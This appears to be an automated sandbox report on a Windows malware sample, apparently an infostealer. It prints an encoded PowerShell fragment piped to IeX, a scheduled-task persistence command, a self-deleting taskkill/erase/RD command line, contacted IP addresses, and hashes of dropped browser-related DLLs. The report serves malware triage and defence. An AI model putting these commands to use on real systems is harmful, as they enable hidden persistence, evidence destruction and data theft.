AQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8A6E.tmp"

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 5104 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\148548454549621\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 5104

Network

Country Destination Domain Proto
N/A 46.183.223.34:80 46.183.223.34 tcp
N/A 185.212.131.198:80 185.212.131.198 tcp

Files

memory/4036-114-0x00007FF661D00000-0x00007FF6652B6000-memory.dmp

memory/4036-115-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-116-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-117-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-118-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-122-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-121-0x00007FF94D100000-0x00007FF94E1EE000-memory.dmp

memory/4036-123-0x00007FF94B200000-0x00007FF94D0F5000-memory.dmp

memory/4064-262-0x0000000000000000-mapping.dmp

memory/3936-267-0x0000000000000000-mapping.dmp

memory/3936-272-0x000001CFB0900000-0x000001CFB0901000-memory.dmp

memory/3936-278-0x000001CFB0933000-0x000001CFB0935000-memory.dmp

memory/3936-277-0x000001CFB0930000-0x000001CFB0932000-memory.dmp

memory/3936-279-0x000001CFC8C60000-0x000001CFC8C61000-memory.dmp

memory/3936-350-0x000001CFC8BE0000-0x000001CFC8BE1000-memory.dmp

memory/3936-389-0x000001CFC8CE0000-0x000001CFC8CE1000-memory.dmp

memory/3936-397-0x000001CFB0936000-0x000001CFB0938000-memory.dmp

memory/3936-398-0x000001CFB0938000-0x000001CFB0939000-memory.dmp

memory/4724-399-0x0000000000000000-mapping.dmp

memory/4724-427-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/4724-429-0x0000000005260000-0x0000000005261000-memory.dmp

memory/4724-430-0x0000000005800000-0x0000000005801000-memory.dmp

memory/4724-431-0x0000000005300000-0x0000000005301000-memory.dmp

memory/4724-432-0x00000000051C0000-0x00000000051C1000-memory.dmp

memory/4724-433-0x00000000053A0000-0x00000000053A1000-memory.dmp

memory/4724-434-0x0000000005300000-0x00000000057FE000-memory.dmp

memory/4724-435-0x0000000008BE0000-0x0000000008BF3000-memory.dmp

memory/4724-436-0x0000000009110000-0x00000000091A3000-memory.dmp

memory/4724-437-0x000000000B980000-0x000000000B9B4000-memory.dmp

memory/5004-438-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8A6E.tmp

MD5 0e10691544eb2f616c343bd80d2eba6b
SHA1 895ebf3b86b56a97c90b960cb80b240fb10f688b
SHA256 f6abf46fc6b6cb54d40285ffa07fc22c556d7b1e6ad79a8ced262ef0d25a7353
SHA512 868543ab66fcca232f8c39fe3218343be83892f23c3680bfd33c5c47b5b9483d14c135a7fb76e1c67f5ca97e519b6c422d70cf946f40793da59406068de7c8b5

memory/5104-442-0x0000000000400000-0x0000000000438000-memory.dmp

memory/5104-443-0x000000000040717B-mapping.dmp

memory/4036-457-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-458-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-459-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/4036-460-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

memory/5104-461-0x0000000000400000-0x0000000000438000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

memory/4284-465-0x0000000000000000-mapping.dmp

memory/4328-466-0x0000000000000000-mapping.dmp